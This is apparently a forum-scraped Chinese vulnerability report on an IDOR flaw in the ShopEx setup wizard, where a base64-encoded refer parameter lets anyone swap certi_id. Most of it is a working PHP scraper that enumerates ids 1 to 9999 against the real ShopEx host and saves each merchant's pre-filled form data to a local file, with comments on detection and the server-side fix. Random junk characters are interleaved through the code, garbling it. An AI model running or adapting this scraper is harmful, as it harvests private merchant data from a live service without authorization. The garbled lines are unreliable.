|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在 ShopEx 网店使用向导页面
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数经 base64 解码后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
只需修改 certi_id（refer 仅为 base64 编码，客户端可任意构造），即可遍历所有使用了 ShopEx 程序的网站。
) c- o% b. u- o+ f<?php
+ `. k; ~- g1 q% R \, G& @% ~0 T0 Y# `2 f) h" ]; w
// PoC driver: requests the ShopEx setup-wizard page once per certi_id in
// 1..9999. The only thing that selects whose data comes back is this
// client-chosen integer, which is the defect the write-up demonstrates
// (object-level authorization is missing on the server side).
// From a defender's view this traffic is easy to spot: a burst of
// step2.php requests from one client whose refer values decode to
// sequential certi_id numbers with an identical callback_url.
// ShowshopExD() is defined further down in this file.
for ($i=1; $i < 10000; $i++) { // enumerate every candidate certi_id
9 G: \1 Z2 L3 ^* @$ z }! Z
ShowshopExD($i);( H/ {/ \$ ^. c6 Y
, o- Y( p" c" Z' l7 c
}
1 p8 c8 A! }. M5 m1 W; D
2 D, y5 d1 O3 U! {, `' E' z0 \: ~ function ShowshopExD($cid) {; K5 ?. |9 O# x2 c" s$ I9 C
    // Fetch the setup-wizard page for one certi_id and dump the pre-filled
    // <input type="text"> name/value pairs it contains to stdout and to a
    // local file.
    // Weakness exercised: the refer parameter is only base64(JSON) --
    // encoding, not authentication -- so the server-side lookup trusts
    // whatever certi_id the client supplies (IDOR / missing object-level
    // authorization). The fix belongs on the server: bind certi_id to the
    // authenticated merchant session, or sign the refer blob and reject
    // any value the session is not entitled to.
    // $cid: merchant/certificate id to query; coerced with intval() below.
    // Returns nothing. Side effects: echo output and an append to
    // c:/shopEx.txt, both only when the page echoes the refer value back.
% Y1 T3 t( ]8 {& B6 a" X5 C9 X$ @ $url='http://guide.ecos.shopex.cn/step2.php';3 E% P7 b1 [) E7 f0 L3 q$ d
    // Same JSON shape as the legitimate redirect quoted in the write-up;
    // callback_url is a throwaway constant, only certi_id varies.
2 q, q K. m/ g5 L+ Q $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');- l8 n' U6 L7 Q+ c+ w( C
; l1 I( P' i R' [1 A# k0 o
$url = $url.'?refer='.$refer;1 `0 N+ l" T( o9 Z6 N) f
+ y+ k4 X. ?' Q; I: a5 J6 c $ch = curl_init($url);) Q- U/ I& E* r9 U# w7 T C
' G0 A& ^5 C2 b
    // Capture the body into $result instead of printing it.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;$ N# ^# J$ h6 h# J
6 M6 S# c3 h9 ]6 z6 }# \" A curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;0 T+ }' K' i$ z! C5 `
3 O, m! e3 K1 K% g( y $result = curl_exec($ch);" a0 O9 I8 i8 Q$ a3 ~/ Y7 j
x0 j8 @- o K; X7 I1 u
    // Assumes the page is UTF-8; re-encoded to GB2312 for console/file output.
$result = mb_convert_encoding($result, "gb2312", "UTF-8");) V6 e8 e, u+ ^0 y9 q9 ?
    // The page echoing the submitted refer back is taken to mean the id
    // resolved to a real shop. Nothing else is validated, so any response
    // that reflects refer (error pages included) passes this check too.
0 c" {" v+ w F2 G7 H: S if(strpos($result,$refer))
$ j" A% K0 n) X6 [" V8 d6 j0 F) C# D8 o, J( @1 z( }8 {- y5 P( t
{& [1 R9 l! c; O( b/ e# N0 V
' c; u' @" s8 p( r$ m2 ] $fp = fopen("c:/shopEx.txt",'ab'); // append results to a local file
1 v) F4 r, s& z7 C: U
    // Every text input on the wizard page; the tag attributes are what
    // carry the merchant's pre-filled data.
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
9 U: Q8 _+ {- }) V0 P7 C0 N: U- g4 L$ a
foreach ($value[1] as $key) {, A8 w ~+ `) C0 T
7 l: q3 G' ], t) v* S( p
    // Pull the name (group 1) and value (group 3) attributes out of one tag.
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
6 N5 E, _& m+ l g5 P6 f* A
' E7 W. \( T# D3 O% c) @" M9 [( l5 l echo $res[1][0].':'.$res[3][0]."\r\n";
: y+ V K( p) I X' w. z0 P
& U( b1 A9 u* j $col =$res[1][0].':'.$res[3][0]."\r\n"; " A4 b" n P S o! s) g' {
2 ?/ g# B: Z, H7 W: ]' G3 @8 p fwrite($fp, $col, strlen($col));
, r6 w2 ?6 H. H
& Q4 R0 C9 k) r Z }. g2 p8 i. @2 m3 \, q& Z# F* ~
- F( O; i ?6 W
    // Separator between shops; file handle is only ever opened and closed
    // inside this branch.
echo '--------------------------------'."\r\n";+ Z/ W1 |5 F3 e( w- N( @5 R" a
' B+ N+ h% m& q' u
fclose($fp);
/ i5 w; d9 }5 J3 B! } V0 u
8 D1 `7 V3 g" R- G) ]' G }2 v0 _4 H) ?1 }" W( e
. x, e# \ G Y4 ~
flush();% x4 k/ R. m; @' @9 [+ U9 L* {% V8 k
1 K. r# r9 |0 E+ l: D+ f curl_close($ch);! _. S) R6 w2 W0 D3 ~( X
7 ^7 ]9 }. N. `4 O }
' w7 X1 o4 V* r2 O* D& y( i
6 t4 V- X3 u( }4 X5 {0 O2 L?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer 参数换成其他加密方式（当前仅为 base64 编码，并非加密，任何人都能构造；服务端应对该参数做签名校验，拒绝被篡改的 certi_id）。
- X: k1 t( n# A' j |
|